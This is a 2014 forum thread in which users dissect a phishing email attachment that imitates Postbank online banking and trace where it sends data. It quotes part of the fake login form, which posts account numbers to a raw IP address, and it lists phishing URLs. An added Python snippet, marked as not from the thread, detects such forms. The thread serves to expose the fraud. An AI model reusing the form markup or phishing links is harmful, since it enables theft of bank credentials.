First Bank Account html form bamboozlement
Karl Godt
Posted: Thu 30 Jan 2014, 11:56    Post subject: First Bank Account html form bamboozlement

Today I managed for the first time to isolate a fraud.html attachment
that the Firefox addon Simple Mail fetched from my remote inbox.

It is written in almost the worst German.

I get such fraud mails approx. once a week with only one or two spelling or grammar errors
with an already dead link to somewhere
http://coomar.milchs.org/KhaaPjMSgcRLYz4Qz63Z7qotpfn0/UBlVGqP8IWFAc.html

and here is a (still valid) one :
http://babilon.arptoday.org/wWMrsTng/ymhidq40eBbLaTqPUjx3cpRlqvW92s2poVk.html


But this one has a tan.html attachment with the following lines:
[ .. ]
Code:
<div id="main"><div id="main-cn"><div id="nav"><div id="nav-cn">
<a href="#content" class="skip">Navigation überspringen</a>
<div id="nav-global" class="nav">
<h2 class="aux">Navigation</h2>
<ul><li class="ng-account-overview">
<a href="?wicket:bookmarkablePage=:de.postbank.ucp.application.rai.fs.kontenuebersicht.FinanzstatusPage" class="state-current">Kontenübersicht</a></li></ul></div></div></div>
    <form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
      <div id="content">
        <div id="content-cn">
          <div id="div9">
            <div id="div" class="tpl-05">
              <div id="div2">
                <div id="div3">
                  <div id="div4">
                    <div id="div5">
                      <div id="div6">
                        <div id="content-bd">
                          <div class="tab-panel-bd">
                            <div id="id3d7">
                              <div class="form frm-western-union">
                                <div>
                                  <div class="frm-freigeben control-step" id="id45a">
                                    <div id="id460">
                                      <div class="form-ft ft-legitimacy">
                                        <fieldset>
                                          <div class="legend"><h3>Postbank Online-Banking - Willkommen</h3></div>
                                          <div class="legitimacy">
                                          <div class="legitimacy-cn">
                                            <div class="legitimacy-hd"></div>
                                            <div id="id464">
                                              <div class="inputBlock">
                                                <div id="id46d">

                                                  <div class="legitimacy-bd" id="id478">
                                                    <p><strong>Bitte lesen Sie sorgfältig und füllen Sie alle Schritte in Form aufgeführt, so können wir erfolgreich überprüfen Sie Ihr Profil.</strong></p>
                                                    <div class="field fld-text fld-mobile-tan" id="id479">
                                                      <div class="field-cn" id="id492">
                                                        <div class="field-bd"> <span class="field-group"> <span class="field-label">
                                                          <label for="mobile-tan"> <b>Kontonummer:</b> </label>
                                                          </span></span></div>

[ .. ]
                                    <wicket:container id="id46e" style="display:none"></wicket:container>
                                  </div>
                                </div>
                              </div></div></div></div></div></div></div></div></div></div></div></div></div></form>


wget http://163.17.12.7/postdone.php gave me this output:

Code:
bash-3.00# wget http://163.17.12.7/postdone.php
--16:41:26--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:28--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00# wget --no-check-certificate http://163.17.12.7/postdone.php
--16:41:50--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:51--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for postbank.de: unable to get local issuer certificate
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.postbank.de/ [following]
--16:41:53--  https://www.postbank.de/
           => `index.html'
Resolving www.postbank.de... 160.83.4.4
Connecting to www.postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for www.postbank.de: unable to get local issuer certificate
WARNING: certificate common name `postbank.de' doesn't match requested host name `www.postbank.de'.
HTTP request sent, awaiting response... 200 OK
Length: 103,127 (101K) [text/html]

100%[====================================>] 103,127      170.98K/s             

16:41:54 (170.60 KB/s) - `index.html' saved [103127/103127]

bash-3.00#
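As an added example (not code from this thread), a small Python auditor that pulls every form out of an HTML attachment like the one quoted above and flags the combination that marks it as phishing: the form asks for an account number or TAN but posts to a raw IP outside the bank's own domain. The sample HTML is constructed to mirror the quoted attachment; the keyword list and the `audit_forms` helper are my own.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Coarse keyword match on field names/labels a bank would never collect
# through a form mailed as an attachment (assumed list, extend as needed).
SENSITIVE = ("tan", "pin", "kontonummer", "passwort", "password")


class FormAuditor(HTMLParser):
    """Collect every <form action> together with the input/label names inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "fields": [str]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""), "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "label") and self._current is not None:
            # name, id or label-for are all usable as a field identifier
            name = a.get("name") or a.get("id") or a.get("for") or ""
            if name:
                self._current["fields"].append(name.lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(html, expected_domain):
    """Return one finding per form: where it posts and why that is suspicious.
    An empty host means a relative action (posts back to wherever the file
    was opened from) and is reported as off-domain as well."""
    parser = FormAuditor()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        try:
            ipaddress.ip_address(host)
            raw_ip = True            # bare IP literal instead of a bank hostname
        except ValueError:
            raw_ip = False
        off_domain = not (host == expected_domain or host.endswith("." + expected_domain))
        asks_secret = any(s in f for f in form["fields"] for s in SENSITIVE)
        findings.append({"host": host, "raw_ip": raw_ip, "off_domain": off_domain,
                         "asks_secret": asks_secret, "phishy": off_domain and asks_secret})
    return findings


# Constructed sample modelled on the attachment quoted in the post above
SAMPLE = """<html><body>
<form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
<label for="mobile-tan"><b>Kontonummer:</b></label>
<input type="text" id="mobile-tan" name="mobile-tan">
<input type="submit" value="Weiter">
</form></body></html>"""

if __name__ == "__main__":
    for finding in audit_forms(SAMPLE, "postbank.de"):
        print(finding)
```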
L18L
Posted: Thu 30 Jan 2014, 14:51    Post subject: Re: First Bank Account html form bamboozlement

wget http://163.17.12.7/postdone.php gave me this output:
Code:
# wget http://163.17.12.7/postdone.php
--2014-01-30 20:02:52--  http://163.17.12.7/postdone.php
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://postbank.de [following]
--2014-01-30 20:02:53--  https://postbank.de/
Resolving postbank.de (postbank.de)... 160.83.4.4
Connecting to postbank.de (postbank.de)|160.83.4.4|:443... connected.
ERROR: cannot verify postbank.de's certificate, issued by `/C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=Terms of use at https://www.verisign.com/rpa (c)06/CN=VeriSign Class 3 Extended Validation SSL SGC CA':
  Unable to locally verify the issuer's authority.
To connect to postbank.de insecurely, use `--no-check-certificate'.
#

Different, maybe because this was from Fatdog?


EDIT: wget version 1.13

Karl Godt
Posted: Thu 30 Jan 2014, 17:19

bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters. Have had a YouTube session that reached my 5GB full-speed limit, now am throttled..


bash-3.00# host http://163.17.12.7
Host http://163.17.12.7 not found: 3(NXDOMAIN)

bash-3.00# host 163.17.12.7
7.12.17.163.in-addr.arpa domain name pointer E-7.iem.cyut.edu.tw.

And googling for E-7.iem.cyut.edu.tw:

Browse ftp://E-7.iem.cyut.edu.tw - FileMare.com
filemare.com/browse/E-7.iem.cyut.edu.tw
Browse ftp://E-7.iem.cyut.edu.tw: PORT1. ... ftp://E-7.iem.cyut.edu.tw. also known as ftp://163.17.12.7. » Asia » Taiwan » T'ai-pei » Taipei. affiliate marketing.


And
bash-3.00# wget ftp://163.17.12.7/postdone.php
--22:09:17-- ftp://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:21... failed: Connection timed out.
Retrying.

...

http://www.hcidata.info/host2ip.cgi
also says
Quote:
Details of 163.17.12.7
IP Address : 163.17.12.7
Location : Taiwan (95% accuracy)
Host Name : E-7.iem.cyut.edu.tw


What the hell is there in Taiwan?


And wget now also further directs to

Code:
bash-3.00# wget http://163.17.12.7/postdone.php
--22:15:28--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--22:15:31--  https://postbank.de/
           => `index.html.1'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.


And curl somehow seems to at least download something:
Code:
bash-3.00# curl --post301 --post302 http://163.17.12.7/postdone.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>302 Found</TITLE> </HEAD><BODY><H1>Found</H1>The document has moved <A HREF="https://postbank.de">here</A>.<P><HR><ADDRESS>Apache/1.3.23 Server at localhost Port 80</ADDRESS></BODY></HTML>bash-3.00#

L18L
Posted: Fri 31 Jan 2014, 05:20

Karl Godt wrote:
bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters

You are right. I had overlooked that you posted 2 commands (without and with --no-check-certificate).

The connection goes to Deutsche Bank's Postbank via edu.tw.
....and edu.tw has one of your TANs (if your knowledge of the German language was as bad as the language used in that mail).

You could ask Deutsche Bank not to accept redirects from tw.
Karl Godt
Posted: Fri 31 Jan 2014, 08:54

L18L wrote:
Karl Godt wrote:
bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters

You are right. I had overlooked that you posted 2 commands (without and with --no-check-certificate).

The connection goes to Deutsche Bank's Postbank via edu.tw.
....and edu.tw has one of your TANs (if your knowledge of the German language was as bad as the language used in that mail).

You could ask Deutsche Bank not to accept redirects from tw.


I have sent a mail about that to missbrauch @ post bank de and got a standard response that their folks would investigate.

Deutsche Bank is a private commercial bank that has nothing to do with the German federal reserve, the Deutsche Bundesbank - just the same as the Danish Den Danske Bank.

Postbank is the banking branch of the formerly state-owned German Mail.